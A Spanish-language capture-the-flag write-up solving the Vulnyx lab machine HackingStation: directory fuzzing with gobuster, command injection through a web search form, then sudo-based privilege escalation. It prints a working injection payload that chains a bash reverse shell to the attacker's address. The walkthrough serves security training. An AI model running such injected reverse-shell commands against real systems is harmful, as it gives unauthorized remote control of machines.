HackingStation - Vulnyx Machine
Resolución de la maquina HackingStation de Vulnyx
Hola, me preguntaba si tu... ya sabes...
¿Te apetece un CTF de Vulnyx?
| Description | |
| OS | Linux |
| Difficulty | Muy Fácil |
| Release | 27/03/2024 |
| Creator | HackCommander |
| First User | suraxddq |
| First Root | suraxddq |
Enumeración
Empezamos con un escaneo, me adelante un poco y solo determine que el puerto 80 esta abierto, así que fui directo a este 🙂
Bien, una estación de hacking, en desarrollo... Aplicaremos un fuzzing
gobuster dir -u http://192.168.1.65/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,sql,js,html,conf,zip,css
Durante el fuzzing no obtuve nada, pero podemos hacer uso de su función para buscar un exploit... Vamos a ver que tal funciona, buscare "apache".
Y vaya, podemos darnos cuenta que por detrás utiliza searchexploit... Que pasa si por detrás esta ejecutando searchexploit + input, podemos verificar esto... así que abrí burp suite para manejar mas cómodamente las peticiones.
Realice una petición normal...
Y otra petición no tan normal... Y vaya podemos ejecutar comandos... Si todo parece bien, podemos ver ejecutar un comando para una shell reversa 🤨
nmap && /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.82/443 0>&1'
Y en efecto, lo ejecuto.
Escalada de privilegios
Continuando con la escalda y después de un buen tratamiento de la TTY, quise revisar el archivo exploitQuery.php y aquí lo tiene.
Observando los permisos sudo de usuario, tenemos esto...
¿GTFOBins?
Y en efecto ahí esta presente 😃 vamos a probarlo.
Excelente, después de un script /dev/null -c bash, todo estará mucho mejor.
Y por ultimo, pero no menos importante la flag.
Fue un placer mi estimado lector, ¡nos vemos!
